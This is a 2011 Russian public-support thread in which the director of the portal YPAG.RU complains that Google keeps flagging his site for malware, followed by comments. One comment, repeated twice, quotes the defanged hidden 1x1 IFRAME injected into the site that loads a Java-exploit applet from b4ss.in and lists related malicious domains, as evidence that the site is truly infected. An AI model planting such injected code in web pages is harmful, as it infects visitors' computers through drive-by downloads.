Публичный саппорт: у Google взбесился антивирус

Раз в 3 дня антивирус Google сообщает что на портале YPAG.RU обнаружено вредоносное ПО. При проверке, нашими администраторами естественно ни чего ни обнаруживается. Дается заявка на пересмотр. Сутки длится пересмотр. Блокировка снимается, а через неделю все по новой.
Из последних шедевров:
13.09.2011 Уважаемый владелец или веб-мастер сайта ypag.ru/! Недавно мы обнаружили, что посещение определенных страниц Вашего сайта может привести к заражению компьютеров пользователей вредоносными программами. Теперь пользователям, переходящим на эти страницы по ссылкам в результатах поиска Google.ru, отображается страница с предупреждением. Ниже мы приводим один или несколько примеров URL страниц Вашего сайта, которые могут привести к заражению компьютеров пользователей: www.ypag.ru/cat/l207/page300.html
www.ypag.ru/cat/pred30/page0.html
www.ypag.ru/cat/komp489/page0.html
Ссылка на типовую страницу с предупреждением: www.google.com/interstitial?url=http://www.ypag.ru/cat/l207/page300.html Мы настоятельно рекомендуем незамедлительно заняться исследованием этой проблемы и обеспечить безопасность посетителей. На некоторых сайтах вредоносное ПО распространяется владельцами умышленно, однако во многих случаях веб-мастера не знают о факте распространения нежелательных программ.

Для примера проверка Dr Web online.us.drweb.com/cache/?i=615c7097d836798f7b0fdcfd976b3d05

Если есть тут представители Google, передайте своим разработчикам антивируса, пусть они его успокоят, а еще лучше отключат. Таких как мы ни один. Много жалоб на ваш антивирус www.google.com/support/forum/p/webmasters/label?lid=7febfdbbfed5375b&hl=ru

Для оперативного решения проблемы свяжитесь со мной bilozor_sergey@mail.ru

С уважением директор портала YPAG.RU
Билозор Сергей Денисович

---------
От редакции: стоит отметить, что Билозор далеко не единственный, кто столкнулся с такой проблемой — idiot.fm/2011/09/14/po-situacii-s-preduprezhdeniem-gugla/

Лучшие комментарии

  • Контекст комментария

    Alexander Sidorov

    Google совершенно правильно считает сайт ypag.ru заражённым. Потому что ypag.ru регулярно начинает распространять вредоносное ПО, потом перестаёт, потом опять начинает. Позавчера, например, в опять начал, а сегодня перестал. В общих чертах, вредоносный код с ypag.ru работает так. В браузер, например, со страницы h**p://www.ypag.ru/cat/komp550/page0.html загружается IFRAME src="h**p://b4ss.in/stat/show.php?key=fcfe7c&u=root" frameBorder=0 width=1 height=1></IFRAME Он подгружает c b4ss.in апплет, эксплуатирующий уязвимости Java, и заражающий систему. На самом деле, не обязательно c b4ss.in, просто с домена [буква][цифра]ss.in. Недавно, например, в качестве источника использовался домен b3ss.in. Так что не на антивирус Google ругаться надо, Сергей Денисович, а вредоносный код с ypag.ru удалить и больше туда не допускать. Что же до антивирусов, то любой антивирус время от времени ошибается, особенно когда нужно выявить drive-by-download атаку с сайта. Лучше дополнять его браузером, который умеет предупреждать о заражённых сайтах через SB API. Мы вот в Яндексе пользуемся своей сборкой Firefox, потому что он настроен на наш SB API, который знает русских заражённых сайтов больше, чем стандартный, да они и перепроверяются у нас чаще.

Добавить 14 комментариев

  • Ответить
    Роман Фролин Альтикс

    На одном закрытом форме, была эпическая история про пионеров которые предлагали разместить на развлекательные порталы небольшой флеш баннер за сто баксов. В баннере было много всего веселого, включая активацию при неактивности аськи админа сайта. Ройте в ту сторону.

  • Ответить
    Альтер Эго

    Не волнуйтесь вы так, зарабатывайте свои миллионы, пока Яндекс, 2ГИС и другие ребята не съедят ваш рынок.

  • Ответить

    Google совершенно правильно считает сайт ypag.ru заражённым. Потому что ypag.ru регулярно начинает распространять вредоносное ПО, потом перестаёт, потом опять начинает. Позавчера, например, в опять начал, а сегодня перестал. В общих чертах, вредоносный код с ypag.ru работает так. В браузер, например, со страницы h**p://www.ypag.ru/cat/komp550/page0.html загружается IFRAME src="h**p://b4ss.in/stat/show.php?key=fcfe7c&u=root" frameBorder=0 width=1 height=1></IFRAME Он подгружает c b4ss.in апплет, эксплуатирующий уязвимости Java, и заражающий систему. На самом деле, не обязательно c b4ss.in, просто с домена [буква][цифра]ss.in. Недавно, например, в качестве источника использовался домен b3ss.in. Так что не на антивирус Google ругаться надо, Сергей Денисович, а вредоносный код с ypag.ru удалить и больше туда не допускать. Что же до антивирусов, то любой антивирус время от времени ошибается, особенно когда нужно выявить drive-by-download атаку с сайта. Лучше дополнять его браузером, который умеет предупреждать о заражённых сайтах через SB API. Мы вот в Яндексе пользуемся своей сборкой Firefox, потому что он настроен на наш SB API, который знает русских заражённых сайтов больше, чем стандартный, да они и перепроверяются у нас чаще.

  • Ответить

    Объяснение примерно такое же, как здесь, я полагаю: http://help.yandex.ru/webmaster/?id=1108949 «Использование. Для корректного ранжирования документа не рекомендуется использовать тег, так как поисковый робот Яндекса не индексирует документы, подгружаемые в него.»

  • Ответить
    Альтер Эго

    хаха, у чувачков почта не доставляется, гугль банит за спам, что дальше? ну и да, конечно же, все идут не в ногу, а только ыпаг в ногу. бизнесь по-русски, он такой.

  • Ответить
    Альтер Эго

    вы бы лучше не в гугле искали, а по содержимому страниц. и заодно еще вот эти домены d2if8.in d3fs.in d4as.in

  • Ответить
    Альтер Эго

    Мы вот в Яндексе пользуемся своей сборкой Firefox, потому что он настроен на наш SB API, который знает русских заражённых сайтов больше, чем стандартный, да они и перепроверяются у нас чаще. Не видел еще яндексоида, который не вставлял бы везде рекламу продуктов своей компании.